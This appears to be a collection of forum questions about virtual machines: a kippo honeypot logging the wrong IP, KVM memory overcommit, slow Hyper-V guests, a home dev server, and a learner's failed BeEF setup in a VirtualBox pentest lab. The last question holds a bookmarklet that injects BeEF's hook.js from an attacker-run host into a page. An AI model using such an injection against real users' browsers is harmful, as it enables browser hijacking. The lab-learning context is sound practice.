Honeypot logs VM’s gateway IP instead of incoming ones

There is a virtual machine (VirtualBox) managed by the Xubuntu OS, with kippo (an SSH trap) running on it. NAT has been set up in the VM’s settings with port forwarding in this way: ssh tcp 195.x.x.x 22 10.0.2.15 22 (rule’s name—protocol—current host IP—host port—virtual machine’s IP—VM’s port). The honeypot logs all connection attempts but writes the VM’s gateway IP instead of the incoming ones. Can anybody explain how to troubleshoot this problem?

Can’t find much documentation regarding overcommitting of memory for VMs on a KVM host

Most operating systems do not use 100% of the available RAM all the time. Having said that, I am unable to find an approximation for this overprovisioning. CPU cores are not a constraint for me.

I have a 64 GB KVM host and would like to provision multiple 8 GB machines. The machines remain underutilized most of the time but are always in a running state. I would like to know the maximum acceptable number of VMs that can be provisioned on this setup without hitting any bottlenecks. The underlying storage is hard disk drives, with no SSD, so there is little room for swap memory as it may impact performance.

Sluggish Linux VMs on Hyper-V

I am experiencing very sluggish response with Linux VMs (Debian) running on Hyper-V on a Windows host (Server 2012 R2).

The VMs themselves are not running at 100% CPU and the host itself is reporting very low CPU usage (10%), yet each new VM I create seems to run slower and slower.

I’d understand if the host CPU was running high, or the VM itself, but that is not the case.

It seems with each VM I create, responsiveness gets worse, which I understand points to CPU resource, but I cannot see any indicators as to that being the case.

Responsiveness of the host seems fine, no issues. Memory usage is OK, Disk I/O isn’t high… Not sure where to look.

Any pointers would be appreciated, thanks.

Home development server with VMs

I currently have 2 servers at home and would like to use one of them for development projects and one of them for a NAS.

Now I want to be able to make VMs on the dev server so I can have a staging environment which can then be piped to production.

I want to be able to use the same server with the VMs to develop from (it must feel like using my own laptop).

How should I achieve this?

How to set up a BeEF hook on another VM’s browser in a NAT Network in VirtualBox

I’m reading “Practical Web Penetration Testing”. I’m using VirtualBox to run two VMs: Windows 7 with Mutillidae and Kali Linux, where I want to use BeEF. Both are connected to a NAT Network 10.0.2.0/24.

As it’s said in the book, I set up Kali Linux to have a static IP by modifying /etc/network/interfaces:

    source /etc/network/interfaces.d/*

    # The loopback network interface
    auto lo
    iface lo inet loopback

    #Static IP Address
    auto eth0
    iface eth0 inet static
        address 10.0.2.99
        netmask 255.255.255.0
        network 10.0.2.0
        broadcast 10.0.2.255
        gateway 10.0.2.1

My Windows VM has IP 10.0.2.4.

I’m now trying to set up BeEF. When I open a tab in each of these VMs’ browsers to http://10.0.2.99:3000/demos/basic.html, I do indeed get the browsers hooked as online browsers in the BeEF UI panel.

But I want to have a hook on Mutillidae. There’s a button for that, to copy as a bookmark that appends the hook.js file to a given webpage:

    javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();

When I run that in either VM’s browser (opened on http://10.0.2.4/mutillidae/index.php), it doesn’t work. The hook.js file does get loaded; I can see it in Firebug. But the browser never gets “hooked”: I can’t see it on the BeEF panel.

I even modified this portion of /etc/beef-xss/config.yaml:

        # Reverse Proxy / NAT
        # If BeEF is running behind a reverse proxy or NAT
        #  set the public hostname and port here
        public: "10.0.2.99"      # public hostname/IP address
        #public_port: "" # experimental

And did some research but nothing…


Some weird stuff (or is that normal?):

From Kali 10.0.2.99

    ping 10.0.2.99    - OK
    ping 10.0.2.4     - KO --> But I can access 10.0.2.4/mutillidae/ !
    ping 10.0.2.1     - OK
    ping 10.0.2.0  -b - KO --> shouldn't I get answers from myself and gateway at least?

From W7 10.0.2.4

    ping 10.0.2.99    - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js
    ping 10.0.2.4     - OK
    ping 10.0.2.1     - OK
    ping 10.0.2.0     - KO --> Reply from 10.0.2.4: Destination host unreachable. Is this why Kali can't access W7?

Why can’t I set up a hook in Mutillidae on the Win7 VM connected to the same NAT Network as the Kali VM running BeEF?

Thanks.


If you need more details to help me out, don’t hesitate. I’ll edit my question to help you help me.